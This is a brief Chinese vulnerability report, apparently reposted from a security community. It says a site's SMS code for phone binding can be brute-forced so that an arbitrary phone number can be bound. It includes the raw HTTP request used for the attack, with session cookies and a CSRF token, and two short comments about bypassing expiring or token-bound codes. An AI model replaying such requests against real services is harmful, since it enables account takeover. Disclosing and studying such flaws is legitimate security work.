绑定手机时，短信码可爆破导致可以绑定任意手机号

39707

POST /users/sms_bind HTTP/1.1
Host: www.example.com
Connection: close
Content-Length: 36
X-NewRelic-ID: xx
Origin: Example Domain
X-CSRF-Token: E0LUsrMqbnqMBHnKISFWhLe6tb9stW83ZndvrnxFyQ0=
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
X-Requested-With: XMLHttpRequest
Referer: Example Domain
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: all_ag9zfmNsaWNrZGVza2NoYXRyDwsSBXVzZXJzGIngh_ECDA-clickdesk_referrer=https%3A//www.example.com/users/sign_in; sign_up_email=xxx%40qq.com; all_ag9zfmNsaWNrZGVza2NoYXRyDwsSBXVzZXJzGIngh_ECDA-proactive_rules_session_cookie=proactive_session; _session_id=7629ede14d8ffc82f388fadd80587894; _ga=GA1.2.1537584995.1407502732

utf8=xxx=948061

本文迁移自知识星球“火线Zone”

39605

验证码一般都不是有时效，或者带有token，这个怎么破，或者几次后就还是输入验证码

39707

leo 那就要看能否绕过了